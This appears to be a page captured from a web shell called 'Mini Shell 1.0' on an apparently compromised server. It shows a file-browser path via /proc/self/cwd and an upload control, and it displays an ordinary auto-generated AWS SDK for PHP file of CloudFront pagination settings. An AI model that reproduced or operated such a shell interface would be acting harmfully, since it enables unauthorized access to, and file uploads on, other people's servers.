HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/cwd/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/
Upload File :
Current File : //proc/self/cwd/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/paginators-1.json.php
<?php
// This file was auto-generated from sdk-root/src/data/cloudfront/2020-05-31/paginators-1.json
return [ 'pagination' => [ 'ListCloudFrontOriginAccessIdentities' => [ 'input_token' => 'Marker', 'output_token' => 'CloudFrontOriginAccessIdentityList.NextMarker', 'limit_key' => 'MaxItems', 'result_key' => 'CloudFrontOriginAccessIdentityList.Items', ], 'ListDistributions' => [ 'input_token' => 'Marker', 'output_token' => 'DistributionList.NextMarker', 'limit_key' => 'MaxItems', 'result_key' => 'DistributionList.Items', ], 'ListInvalidations' => [ 'input_token' => 'Marker', 'output_token' => 'InvalidationList.NextMarker', 'limit_key' => 'MaxItems', 'result_key' => 'InvalidationList.Items', ], 'ListKeyValueStores' => [ 'input_token' => 'Marker', 'output_token' => 'KeyValueStoreList.NextMarker', 'limit_key' => 'MaxItems', 'result_key' => 'KeyValueStoreList.Items', ], 'ListPublicKeys' => [ 'input_token' => 'Marker', 'output_token' => 'PublicKeyList.NextMarker', 'limit_key' => 'MaxItems', 'result_key' => 'PublicKeyList.Items', ], 'ListStreamingDistributions' => [ 'input_token' => 'Marker', 'output_token' => 'StreamingDistributionList.NextMarker', 'limit_key' => 'MaxItems', 'result_key' => 'StreamingDistributionList.Items', ], ],];